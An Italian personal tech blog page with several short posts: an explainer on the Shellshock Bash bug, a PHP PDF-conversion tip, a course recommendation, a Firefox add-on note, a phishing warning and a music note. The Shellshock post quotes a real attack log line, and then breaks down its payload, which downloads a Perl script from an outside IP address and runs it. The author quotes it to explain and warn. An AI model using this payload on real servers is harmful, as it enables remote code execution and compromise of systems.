Shellshock: Bug nella Bash

La famigerata Shellshock , anche conosciuta come Bashdoor , è una famiglia di problemi di sicurezza presente nell’ampiamente utilizzata Shell UNIX Bash dove, il primo buco rilevato, è stato evidenziato a partire dal 24 Settembre 2014.

Numerosi servizi internet, come ad esempio i Web Servers, utilizzano Bash per elaborare alcune richieste e, nel caso in cui sia utilizzata una versione vulnerabile, consentono ad un potenziale malintenzionato di eseguire codice malevolo in remoto.

Si tratta di un problema estremamente grave perché consente ad un cracker di ottenere l’accesso e i privilegi di amministratore sul sistema attaccato, con tutti i problemi che ne conseguono.

Il bug in questione consente di eseguire un comando di sistema nel momento in cui lo si va a concatenare alla fine di una definizione di funzione salvata all’interno di una variabile d’ambiente.

Di questo gravissimo problema ho letto alcuni mesi fa e solo oggi (14/01/2015) un sito che amministro – e di cui controllo frequentemente i logs – risulta aver subito un attacco, eccolo:

"GET /cgi-bin/test.cgi HTTP/1.0" 404 940 "-" "() { :;}; /bin/bash -c \"cd /var/tmp ; wget http://185.56.60.83/ip.cgi ; curl -O http://185.56.60.83/ip.cgi;perl ip.cgi;perl /var/tmp/ip.cgi\""

L’attaccante – che, nel caso specifico, risulta provenire dall’Olanda – cerca si sfruttare la presenza del file “test.cgi” e di passargli la definizione di una funzione vuota prima:

() { :;};

e, successivamente, gli accoda questo comando:

/bin/bash -c \"cd /var/tmp ; wget http://185.56.60.83/ip.cgi ; curl -O http://185.56.60.83/ip.cgi;perl ip.cgi;perl /var/tmp/ip.cgi\"

che possiamo – per chiarezza – scomporre in più righe:

cd /var/tmp
wget http://185.56.60.83/ip.cgi
curl -O http://185.56.60.83/ip.cgi
perl ip.cgi
perl /var/tmp/ip.cgi

dove viene:

  1. Resa corrente la cartella “/var/tmp”.
  2. Scaricato un CGI (“ip.cgi”) sia con il metodo “WGET” che “CURL” (uno dei due andrà !)
  3. Lanciata l’esecuzione tramite PERL .

Nel momento in cui scrivo non ho la possibilità di scaricarmi il CGI per analizzarne il contenuto, ma intendo farlo appena possibile.

E’ immaginabile che il suo scopo sia tutt’altro che amichevole ma, la cosa che più mi ha incuriosito, è la modalità con la quale sia possibile bucare un web server, veramente inquietante.

PHP: Convertire e Proteggere un PDF multipagina

Ho avuto necessità di crearmi uno strumento, fruibile online, che mi consenta di caricare un PDF – generato da un programma di Office, quindi, con testo e immagini selezionabili e copiabile – in uno che invece non consenta la copia, anzi, deve trattarsi di pagine costituite da immagini (praticamente il testo e le immagini vengono convertite in immagini, una sorta di screenshot delle varie pagine) che, via via, risultano sempre più offuscate fino a risultare illeggibili.

Chiaramente le necessità di offuscamento varieranno a seconda delle proprie necessità ma, grosso modo, do qui qualche consiglio su come operare la cosa in PHP.

Leggi tutto “PHP: Convertire e Proteggere un PDF multipagina”

Corsi per Imparare a Programmare Applicazioni Web

Se si ha il desiderio di imparare a sviluppare Applicazioni WEB, ma anche per Smartphone e altro, ho scoperto un sito che dire “è fatto molto bene” ritengo sia oltremodo riduttivo. Si tratta di CodeSchool

E’ formato da una valanga di corsi su tutti i più diffusi linguaggi di programmazione (Javascript, jQuery, PHP, ecc..) e metatag (HTML, CSS, ecc…), strumenti vari (Git), Sistemi Operativi (Android, iOS, ecc…) e molto altro.

I corsi sono fatti benissimo: video, slide in PDF, sessioni interattive (dove scrivi il codice e lo provi in stile videogioco, con punteggi e quant’altro) a prova di babbeo.

L’unico difetto immagino sia il fatto che tutto è rigorosamente in inglese ma immagino che pretendere di avere la pappa pronta in italiano sia pure troppo.

Alcune cose sono gratuite, la maggior parte chiaramente a pagamento anche perché, ripeto, la qualità della cosa è davvero eccezionale.

Firefox 29: Aprile File Locali ( file:// )

Una premessa: non ho ancora trovato una soluzione che mi consenta di aprire direttamente i files ma, con le cartelle, funziona.

Purtroppo è necessario installare un add-on: caps-fileuri

E’ utile per tutti quelli che hanno una Intranet e gli piace avere la possibilità di aprire Link a File Locali da un Browser aggiornato (come appunto Firefox 29 ).

Se trovo di meglio, ve lo faccio sapere.

Phishing: Richiamo Urgente! Aggiorna il tuo ID Apple il più presto possibile!

ATTENZIONE: Il seguente messaggio è una TRUFFA (Phishing) e va cestinato in automatico:

Messaggio Truffa: Richiamo Urgente! Aggiorna il tuo ID Apple il più presto possibile!
Messaggio Truffa: Richiamo Urgente! Aggiorna il tuo ID Apple il più presto possibile!

Lo si capisce già dal pessimo italiano con il quale è stato scritto; probabilmente è indirizzato pure ad un indirizzo e-mail che non è il vostro (e vi arriva comunque), ecc…

Tutte cose che non esiste provengano da Apple.

Musica Spot: “Contemporaneo Italiano” su Iris

Era da un bel po’ che cercavo di capire che musica hanno messo ad uno (sì, ce ne sta più di uno) degli spot dedicati al ciclo “Contemporaneo Italiano” su Iris (canale 22 DGTV, di Mediaset).

Dura pochissimo (circa 1 min) e, con sorpresa, ho scoperto trattarsi del pezzo finale (posizione 4:30) di una famosa canzone: Spandau Ballet – Through The Barricades